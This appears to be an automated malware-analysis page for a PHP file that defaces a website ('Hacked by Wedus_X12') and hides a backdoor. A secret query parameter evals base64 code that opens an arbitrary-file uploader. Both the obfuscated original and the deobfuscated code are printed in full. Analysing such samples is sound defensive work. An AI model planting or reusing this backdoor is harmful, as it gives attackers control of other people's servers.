PHP Malware Analysis

Back to list

Filename: index.php

Tags

Encoding
  • base64_decode
URLs
Title
  • Hacked by Wedus_X12 Ft Zx-Rst1337
Execution
  • eval
Input
  • _GET

Deobfuscated code

<?php

$O = 's';
$jK = 'z';
$BNYHW = 'n';
$Vh = 'a';
$fZ = '_';
$AXcNG = 'b';
$LFCXt = 'd';
$wKmN = 'e';
$fHL = 'r';
$wE = 'g';
$rM = 'v';
$VKcu = 'c';
$A = 'i';
$nqd = 'o';
$Ysm = '6';
$fbB = 'l';
$pJ = '4';
$gM = 't';
$gkjAe = 'f';
$PsZRL = "base64_decode";
$sKeW = "gzinflate";
$wVuoW = "strrev";
eval /* PHPDeobfuscator eval output */ {
    ?><!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="icon" href="https://fjr.nasiwebhost.com/gambar/Wedus.jpg">
    <title>Hacked by Wedus_X12 Ft Zx-Rst1337</title>
    <meta name="description" content="#Daring Or Darling?">
    <meta http-equiv="cache-control" content="index,cache"> 
  <meta http-equiv="pragma" content="index,cache"> 
    <link href="https://fonts.googleapis.com/css2?family=Fruktur&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css2?family=Patrick+Hand&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css2?family=Shojumaru&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css2?family=Jolly+Lodger&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Chewy" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Merienda&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Ranga&display=swap" rel="stylesheet">
  <link href="http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|Cabin+Sketch|Iceberg|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda|Inconsolata|Iceland" rel="stylesheet" >
  <link href="https://fonts.googleapis.com/css?family=Rancho" rel="stylesheet">
  <link href="http://fonts.googleapis.com/css?family=Iceland:400,700" rel="stylesheet" type="text/css"> 
  <link href="http://fonts.googleapis.com/css?family=Iceland:400,700" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Dokdo|Gloria+Hallelujah|Indie+Flower|Permanent+Marker" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Righteous" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Fredericka+the+Great|Kaushan+Script|Press+Start+2P|Rationale" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Chewy" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Londrina+Sketch" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Permanent+Marker|Righteous" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Iceberg:400,700" rel="stylesheet" type="text/css">  
    <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>    
    <body style="background:black;"><center><div class="four-zero-four-container"><div class="code"><div class="four-zero-four-container"><div class="code"><center><span style="font-size:38px; background: url("http://solevisible.com/images/bg_effect_up.gif") repeat-x scroll 0% 0% transparent; color: yellow; text-shadow: 10px 8px 13px;"><strong><b><big>Hacked by Wedus_X12 Ft Zx-Rst1337</div><div class="message"><br><center><font face="iceland" size="7" color="lime">
<pre>
        ,     \    /      ,        
       / \    )\__/(     / \       
      /   \  (_\  /_)   /   \      
 ____/_____\__\@  @/___/_____\____ 
|             |\../|              |
|              \VV/               |
|       Keep Calm and Santuy      |
|_________________________________|
 |    /\ /      \\       \ /\    | 
 |  /   V        ))       V   \  | 
 |/     `       //        '     \| 
 `              V                '
      </pre></font>
          <font face="Reggae" size="9" color="lime">Greetz :
<br>
      <font face="iceberg" size="6" color="orange">Clan X12 | Indonesian Secure System | Saitama Crew Xploit<br><br></marquee></div></font></center></body></head></html><center> <audio id="myAudio"> <source src="https://e.top4top.io/m_2086oqoxt0.mp3" type="audio/ogg"></audio> <button onclick="playAudio()" style="background: black; border-radius:10px; font-family:Iceberg;"><font style="font-family:Iceberg; text-decoration:bold; text-shadow: 2px 0 1px orangedark, 1px 2px 0 bluedark;" color="orangedark" size="6"><b> PLAY</b></font></button><font color="lime">----</font><button onclick="pauseAudio()" style="background: black; border-radius:10px; font-family:Iceberg;"><font style="font-family:Iceberg; text-decoration:bold; text-shadow: 2px 0 1px orangedark, 1px 2px 0 bluedark;" color="orangedark" size="6"><b>STOP</button></center> <script> var x = document.getElementById("myAudio"); function playAudio() { x.play(); } function pauseAudio() { x.pause(); } </script>
 <?php 
    if (isset($_GET["Ayaa"]) && $_GET["Ayaa"] == "Ayaa") {
        $func = "create_function";
        $x = function ($c) {
            eval('?>' . base64_decode($c));
        };
        $x("PD9waHAgZWNobyAiPHRpdGxlPldlZHVzIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9\r\nIzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAg\r\nQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxi\r\naWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVN\r\nT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMw\r\nMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPldl\r\nZHVzIFVwbG9hZCA8L2JpZz48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPjwvZm9u\r\ndD48L2NlbnRlcj48YnI+XG48Y2VudGVyPjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVs\r\ndGlwYXJ0L2Zvcm0tZGF0YScgbmFtZT0ndXBsb2FkZXInPiI7ZWNobyAnPGlucHV0IHR5cGU9ImZp\r\nbGUiIG5hbWU9ImZpbGUiIHNpemU9IjQ1Ij48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0\r\nIiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPjwvY2VudGVyPic7aWYoaXNzZXQoJF9Q\r\nT1NUWydfdXBsJ10pJiYkX1BPU1RbJ191cGwnXT09ICJVcGxvYWQiKXtpZihAbW92ZV91cGxvYWRl\r\nZF9maWxlKCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1l\r\nJ10pKSB7ZWNobyAnPGI+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjxjZW50ZXI+VXBsb2FkIFN1Y2Nl\r\nc3NmdWxseSA7KTwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7\r\nfWVsc2V7ZWNobyAnPGI+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjxjZW50ZXI+VXBsb2FkIGZhaWxl\r\nZCA6KDwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7fX1lY2hv\r\nICc8Y2VudGVyPjxzcGFuIHN0eWxlPSJmb250LXNpemU6MzBweDsgYmFja2dyb3VuZDogdXJsKCZx\r\ndW90O2h0dHA6Ly9zb2xldmlzaWJsZS5jb20vaW1hZ2VzL2JnX2VmZmVjdF91cC5naWYmcXVvdDsp\r\nIHJlcGVhdC14IHNjcm9sbCAwJSAwJSB0cmFuc3BhcmVudDsgY29sb3I6IHJlZDsgdGV4dC1zaGFk\r\nb3c6IDhweCA4cHggMTNweDsiPjxzdHJvbmc+PGI+PGJpZz53ZWR1c2dhbnRlbmc1NkBnbWFpbC5j\r\nb208L2I+PC9iaWc+PC9zdHJvbmc+PC9zcGFuPjwvY2VudGVyPic7Pz4=\r\n");
        exit;
    }
};


Original code

<?php $O='s';$jK='z';$BNYHW='n';$Vh='a';$fZ='_';$AXcNG='b';$LFCXt='d';$wKmN='e';$fHL='r';$wE='g';$rM='v';$VKcu='c';$A='i';$nqd='o';$Ysm='6';$fbB='l';$pJ='4';$gM='t';$gkjAe='f';$PsZRL=$AXcNG.$Vh.$O.$wKmN.$Ysm.$pJ.$fZ.$LFCXt.$wKmN.$VKcu.$nqd.$LFCXt.$wKmN;$sKeW=$wE.$jK.$A.$BNYHW.$gkjAe.$fbB.$Vh.$gM.$wKmN;$wVuoW=$O.$gM.$fHL.$fHL.$wKmN.$rM;eval($sKeW($wVuoW($PsZRL('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'))));